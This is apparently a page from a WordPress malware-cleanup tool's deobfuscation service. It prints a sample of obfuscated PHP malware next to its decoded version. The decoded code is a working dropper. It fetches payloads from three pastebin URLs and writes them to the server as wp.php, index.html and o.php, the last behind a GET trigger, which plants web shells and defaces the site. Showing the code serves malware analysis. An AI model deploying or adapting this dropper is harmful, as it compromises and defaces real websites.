Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ${"\x47LOBAL\x53"}["\x68ff\x62\x78u\x67\x75\x63u\x65"]="\x73\x79\x73te\x6d";$whuvttdtspl="\x73\x79s\x74\x65m";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x75\x71d\x65\x6bl\x78"]="\x66o";${"\x47\x4c\x4fBA\x4c\x53"}["\x6e\x6e\x73uk\x76\x64\x73"]="\x53\x68\x65\x6c\x6ct\x78t";${"G\x4c\x4f\x42\x41LS"}[...



Obfuscated php code

<?php ${"\x47LOBAL\x53"}["\x68ff\x62\x78u\x67\x75\x63u\x65"]="\x73\x79\x73te\x6d";$whuvttdtspl="\x73\x79s\x74\x65m";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x75\x71d\x65\x6bl\x78"]="\x66o";${"\x47\x4c\x4fBA\x4c\x53"}["\x6e\x6e\x73uk\x76\x64\x73"]="\x53\x68\x65\x6c\x6ct\x78t";${"G\x4c\x4f\x42\x41LS"}["s\x7a\x77q\x6bkdt\x66\x68"]="c";$hgcgpqkfkoi="\x66\x6f";${"\x47\x4cO\x42\x41\x4c\x53"}["vi\x62\x6do\x69c\x70\x70"]="\x75n\x61\x6d\x65";${"\x47\x4cOBA\x4cS"}["jxnh\x76\x6dg\x6df"]="\x70w\x64";${${"\x47L\x4f\x42A\x4c\x53"}["\x6ax\x6ehv\x6d\x67mf"]}=getcwd();${${"\x47L\x4fBALS"}["\x76i\x62\x6do\x69\x63\x70\x70"]}=php_uname();echo"$uname";${"\x47L\x4f\x42\x41\x4c\x53"}["\x7a\x6d\x6b\x63\x62of"]="\x66o";echo"\n";echo"$pwd";${"\x47\x4c\x4fB\x41LS"}["e\x6bb\x67\x73\x6fxy\x6d\x68"]="\x53\x68ellt\x78\x74";$fberjxmijl="S\x68\x65\x6c\x6c\x74xt";function http_get($url){${"G\x4c\x4f\x42\x41LS"}["\x62\x62mq\x6d\x76\x66"]="\x75\x72\x6c";${${"\x47LO\x42A\x4c\x53"}["\x73\x7a\x77\x71\x6b\x6b\x64t\x66h"]}=curl_init(${${"GL\x4f\x42\x41\x4cS"}["\x62\x62\x6d\x71\x6d\x76\x66"]});curl_setopt(${${"\x47\x4c\x4f\x42AL\x53"}["\x73zw\x71\x6bk\x64\x74\x66\x68"]},CURLOPT_RETURNTRANSFER,1);$iuxurjewyiwj="\x63";curl_setopt(${${"G\x4c\x4f\x42A\x4c\x53"}["\x73\x7a\x77\x71\x6b\x6b\x64tf\x68"]},CURLOPT_CONNECTTIMEOUT,10);curl_setopt(${${"\x47\x4c\x4fB\x41\x4c\x53"}["s\x7a\x77\x71k\x6bd\x74fh"]},CURLOPT_FOLLOWLOCATION,1);$abtvsqkycnll="\x63";${"GL\x4fB\x41L\x53"}["aw\x74\x6cwr\x6fg\x63\x67"]="\x63";curl_setopt(${${"\x47L\x4fB\x41LS"}["\x61\x77\x74\x6c\x77\x72\x6fgc\x67"]},CURLOPT_HEADER,0);return curl_exec(${$abtvsqkycnll});curl_close(${$iuxurjewyiwj});}${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6en\x73\x75kv\x64\x73"]}=http_get("ht\x74\x70s://\x70\x61st\x65\x62i\x6e.com/\x72a\x77/\x4b7j\x6aY8\x34r");${$hgcgpqkfkoi}=fopen("\x77\x70\x2ep\x68p","\x77");fwrite(${${"\x47\x4c\x4f\x42AL\x53"}["\x78\x75q\x64\x65\x6b\x6c\x78"]},${${"G\x4c\x4f\x42A\x4c\x53"}["\x6en\x73\x75\x6bvds"]});${$fberjxmijl}=http_get("h\x74\x74\x70\x73://\x70\x61s\x74\x65\x62i\x6e.\x63\x6fm/\x72a\x77/r\x42T\x50e\x64\x33\x69");$stiobxlfcbuv="f\x6f";${${"\x47\x4cO\x42\x41\x4cS"}["zm\x6bc\x62o\x66"]}=fopen("\x69nd\x65\x78\x2eh\x74\x6dl","w");fwrite(${$stiobxlfcbuv},${${"GL\x4f\x42A\x4cS"}["e\x6b\x62\x67\x73\x6f\x78y\x6dh"]});error_reporting(0);${${"G\x4cOBALS"}["\x68f\x66\x62\x78ugu\x63\x75e"]}=$_GET["\x6f"];if(${$whuvttdtspl}=="\x6f"){$rxqlewnxeg="f\x6f";$mgnpvk="\x53he\x6cl\x74\x78t";${"\x47\x4c\x4f\x42ALS"}["\x76\x74\x65\x66vy"]="\x66\x6f";$stuyrktujs="\x53\x68\x65ll\x74\x78t";${$stuyrktujs}=http_get("h\x74tps://\x70\x61\x73\x74\x65\x62\x69\x6e.c\x6f\x6d/raw/c7\x650A2\x4a\x52");${$rxqlewnxeg}=fopen("\x6f.ph\x70","w");fwrite(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x76\x74ef\x76y"]},${$mgnpvk});}
?>

Decoded(de-Obfuscated) php code

<?php

$GLOBALS["hffbxugucue"] = "system";
$whuvttdtspl = "system";
$GLOBALS["xuqdeklx"] = "fo";
$GLOBALS["nnsukvds"] = "Shelltxt";
$GLOBALS["szwqkkdtfh"] = "c";
$hgcgpqkfkoi = "fo";
$GLOBALS["vibmoicpp"] = "uname";
$GLOBALS["jxnhvmgmf"] = "pwd";
$pwd = getcwd();
$uname = php_uname();
echo "{$uname}";
$GLOBALS["zmkcbof"] = "fo";
echo "\n";
echo "{$pwd}";
$GLOBALS["ekbgsoxymh"] = "Shelltxt";
$fberjxmijl = "Shelltxt";
function http_get($url)
{
    $GLOBALS["bbmqmvf"] = "url";
    $c = curl_init($url);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $iuxurjewyiwj = "c";
    curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
    $abtvsqkycnll = "c";
    $GLOBALS["awtlwrogcg"] = "c";
    curl_setopt($c, CURLOPT_HEADER, 0);
    return curl_exec($c);
}
$Shelltxt = http_get("https://pastebin.com/raw/K7jjY84r");
$fo = fopen("wp.php", "w");
fwrite($fo, $Shelltxt);
$Shelltxt = http_get("https://pastebin.com/raw/rBTPed3i");
$stiobxlfcbuv = "fo";
$fo = fopen("index.html", "w");
fwrite($fo, $Shelltxt);
error_reporting(0);
$system = $_GET["o"];
if ($system == "o") {
    $rxqlewnxeg = "fo";
    $mgnpvk = "Shelltxt";
    $GLOBALS["vtefvy"] = "fo";
    $stuyrktujs = "Shelltxt";
    $Shelltxt = http_get("https://pastebin.com/raw/c7e0A2JR");
    $fo = fopen("o.php", "w");
    fwrite($fo, $Shelltxt);
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.